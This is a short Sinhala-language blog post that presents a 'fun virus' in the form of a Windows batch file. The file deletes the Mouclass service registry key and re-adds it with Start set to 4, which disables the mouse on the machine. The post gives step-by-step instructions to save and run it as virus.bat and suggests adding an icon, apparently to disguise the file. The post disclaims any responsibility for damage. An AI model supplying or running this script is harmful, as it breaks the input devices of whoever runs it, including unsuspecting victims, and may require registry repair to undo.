disable mouse (පුංචි ෆන් වයිරස් එකක්...! )
ලිව්වේ
Chamithu
6:22 PM
හ්ම්ම් යාලුවනේ..මේක පුංචි ෆන් වයිරස් එකක්නේ...හදල ඕපන් කරාම මවුස් එක ඩිසේබ්ල් වෙනව...හදලම බලන්නකු එහෙනම්..මුලින්ම Notepad ඕපන් කරගන්නකෝ...
ඊටපස්සෙ මේ කෝඩ් එක කොපි කරගන්නකෝ... (ඕපන් වෙලා මොනෝහරි වුනොත් වගකියන්නෑ ඈ )
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
ඊටපස්සෙ Notepad නේම් එක virus.bat කියල සේව් කරගන්නකූ....ඊටපස්සෙ ඕපන් කලාම වයිරස් එක වැඩ..ඕනනං ෆයිල් එකට අයිකන් එකක් දාගන්න ඈ :3
Subscribe to:
Post Comments (Atom)
0 අදහස්:
Post a Comment
කමෙන්ට් එකක් දාන්න අමතක කරන්නෙපා ඈ ;)
ҳ̸Ҳ̸ҳ>>>CjzZone<<<ҳ̸Ҳ̸ҳ
ඔයාලගෙ කමෙන්ට් ගොඩක් වටිනව :)